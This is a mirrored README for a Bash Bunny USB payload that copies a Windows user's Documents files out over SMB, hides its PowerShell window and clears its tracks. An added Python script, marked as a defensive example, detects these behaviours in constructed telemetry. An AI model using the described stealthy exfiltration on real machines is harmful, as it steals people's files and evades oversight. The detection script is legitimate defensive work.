mirror of
https://github.com/hak5darren/bashbunny-payloads.git
synced 2025-10-29 16:58:12 +00:00
# Faster SMB Exfiltrator

* Author: Hak5Darren
* Props: ImNatho, mike111b, madbuda
* Version: 1.0
* Target: Windows XP SP3+ (PowerShell)
* Category: Exfiltration
* Attackmodes: HID, Ethernet

## Description

Exfiltrates select files from the user's Documents folder via SMB.

Liberated documents will reside in the Bash Bunny loot directory under `loot/smb_exfiltrator/HOSTNAME/DATE_TIME`.

Rewrite of the original SMB Exfiltrator payload with:

* Faster copying, using robocopy multithreaded mode
* Faster finish, using an EXFILTRATION_COMPLETE file
* Offload logic to target PC for accurate date/time
* Clears tracks by default without second run dialog
* Test-Connection handling by ICMP (no lame sleeps)
* Hidden powershell window by default
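
From a defender's side, the behaviours listed above leave host telemetry that can be correlated. The following is an added example, not part of this payload or repository: it reports hosts where at least two of those behaviours appear together. The event tuples, host names, addresses and command-line shapes are constructed assumptions; the payload's own commands are not shown on this page.

```python
import re
from collections import defaultdict

# Patterns for the behaviours the README lists. The command-line shapes are
# assumptions for this example; the payload's own commands are not shown here.
UNC_PATH = re.compile(r'(?<!\S)"?\\\\[^\\\s"]+\\[^\s"]+')    # \\host\share...
ROBOCOPY_MT = re.compile(r"(?i)(?<!\S)/MT(:\d+)?(?!\S)")      # multithreaded copy
HIDDEN_WINDOW = re.compile(r"(?i)(?<!\S)-w[a-z]*\s+hid")      # -WindowStyle Hidden
MARKER_NAME = "EXFILTRATION_COMPLETE"                         # name from the README

def indicators(text):
    """Return the set of indicator names found in one telemetry string."""
    hits, lower = set(), text.lower()
    if "robocopy" in lower and ROBOCOPY_MT.search(text) and UNC_PATH.search(text):
        hits.add("robocopy_mt_unc")
    if "powershell" in lower and HIDDEN_WINDOW.search(text):
        hits.add("hidden_powershell")
    if MARKER_NAME in text:
        hits.add("completion_marker")
    return hits

def triage(events, threshold=2):
    """Group indicators per host; report hosts with >= threshold distinct ones.

    A single indicator (e.g. a backup job using robocopy /MT to a share) is
    common in normal administration, so it is not reported on its own.
    """
    per_host = defaultdict(set)
    for host, text in events:
        per_host[host] |= indicators(text)
    return {h: sorted(i) for h, i in per_host.items() if len(i) >= threshold}

# Constructed sample telemetry: (host, process command line or created file path).
SAMPLE_EVENTS = [
    ("WS-014", r"powershell.exe -WindowStyle Hidden -File s.ps1"),
    ("WS-014", r"robocopy.exe C:\Users\alice\Documents \\192.0.2.10\share\loot *.docx /S /MT"),
    ("WS-014", r"\\192.0.2.10\share\EXFILTRATION_COMPLETE"),
    ("FS-002", r"robocopy.exe D:\Projects \\backup01\nightly\Projects /MIR /MT:16"),
    ("WS-020", r"powershell.exe -NoProfile -Command Get-Date"),
]

if __name__ == "__main__":
    for host, found in triage(SAMPLE_EVENTS).items():
        print(f"ALERT {host}: {', '.join(found)}")
```
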
## Configuration

Configured to copy docx files by default. To copy a different file type, change `$exfil_ext` in `s.ps1` to the desired extension.

## STATUS

| LED                 | Status                                 |
| ------------------- | -------------------------------------- |
| Red (blinking)      | Impacket not found in /pentest         |
| Magenta (blinking)  | HID Stage                              |
| Magenta             | Ethernet Stage                         |
| Magenta/Blue        | Receiving files                        |
| White               | Moving liberated files to mass storage |
| Green               | Finished                               |